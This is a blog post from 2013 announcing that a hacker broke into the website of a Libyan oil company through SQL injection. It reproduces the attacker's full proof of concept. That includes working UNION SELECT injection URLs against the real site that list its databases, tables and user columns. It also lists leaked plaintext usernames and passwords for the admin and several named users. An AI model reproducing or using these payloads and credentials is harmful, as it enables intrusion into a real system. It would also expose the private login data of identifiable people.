http://digital-intifada.blogspot.com/2012/04/digital-intifada-exclusive-interview.html

Wednesday, 6 March 2013

Arabian Gulf Oil Company(Agoco) website hacked by QuisterTow

A hacker with online handle QuisterTow has claimed to have identified a critical SQL Injection vulnerability in Agoco website(agoco.com.ly) - Arabian Gulf Oil Company based in Benghazi, Libya, engaged in crude oil and natural gas exploration, production and refining.

The hacker exploit this vulnerability and managed to dump the database from the server.  He has leaked the login credentials from the database along with the database details.

The leak(pastebin.com/8HLiDqVt ) contains usernames and passwords of admin and few users.  The password used by admin is very weak one and leaked in plain-text format.

The hacker also provided the vulnerable link along with the proof-of-concept to exploit this SQL injection vulnerability that lists the username &password information.

  1. ==========
  2. Target : http://www.agoco.com.ly/  [Arabian Gulf Oil Company]
  3. Author : QuisterTow     /     twitter.com/quistertow
  4. Hour   : 17:58
  5. Date   : 6 march 2013
  6. ==========
  7. /*!DATABASES*/
  8.  
  9. information_schema
  10. agococo_agoco  - current database
  11. agococo_agoen
  12.  
  13. SINTAX : http://www.agoco.com.ly/search/details.php?cid=75&id=-1148 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(schema_name) from information_schema.schemata-- -
  14.  
  15. /*!end*/
  16.  
  17. /*!TABLES*/
  18.  
  19. AIRLINES_SCEDULE
  20. USERS_ACCESS_RIGHT
  21. airlines
  22. artical
  23. category
  24. client_category
  25. clients
  26. economic_services
  27. es_daily_actions
  28. es_items
  29. guest_book
  30. nationalty_cd
  31. occupation
  32. order_category
  33. order_items
  34. oreder_header
  35. page_customization
  36. professional_cd
  37. users
  38. vacancies_need
  39. vote_a
  40. vote_q
  41.  
  42. SINTAX : http://www.agoco.com.ly/search/details.php?cid=75&id=-1148 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(/*!table_name*/) from information_schema.tables where table_schema=database()-- -
  43.  
  44. /*!end*/
  45.  
  46. /*!USERS COLUMNS */
  47.  
  48. id
  49. user_nm
  50. user_id
  51. user_password
  52. admin_fg
  53. active_fg
  54. news_fg
  55. tenders_fg
  56. events_fg
  57. env_fg
  58. presentation_fg
  59. project_fg
  60. traning_fg
  61. chairman_fg
  62. super_user
  63. careers_fg
  64. magazine_fg
  65. conference_fg
  66. business_fg
  67. about_fg
  68. libya_fg
  69. link_fg
  70. travel_fg
  71. vacancies_fg
  72. benefits_fg
  73. community_fg
  74. applying_fg
  75. annoucments_fg
  76. exploration_fg
  77.  
  78. SINTAX : http://www.agoco.com.ly/search/details.php?cid=75&id=-1148 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(/*!column_name*/) from information_schema.columns where /*!table_name*/=0x7573657273-- -
  79.  
  80. /*!END*/
  81.  
  82. /*!DATA -- user and password */
  83. admin:ecs747:
  84. sofian shibani:123456:
  85. intisar:ecs747:
  86. hak:nimb:
  87. agoco admin:ecs747:
  88.  
  89. SINTAX : http://www.agoco.com.ly/search/details.php?cid=75&id=-1148 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(user_nm,0x3a,/*!user_password*/,0x3a) from users-- -
  90.  
  91. /*!end*/
  92.  
  93.  
  94. That's all
  95.  
  96.       QuisterTow

No comments:

Post a Comment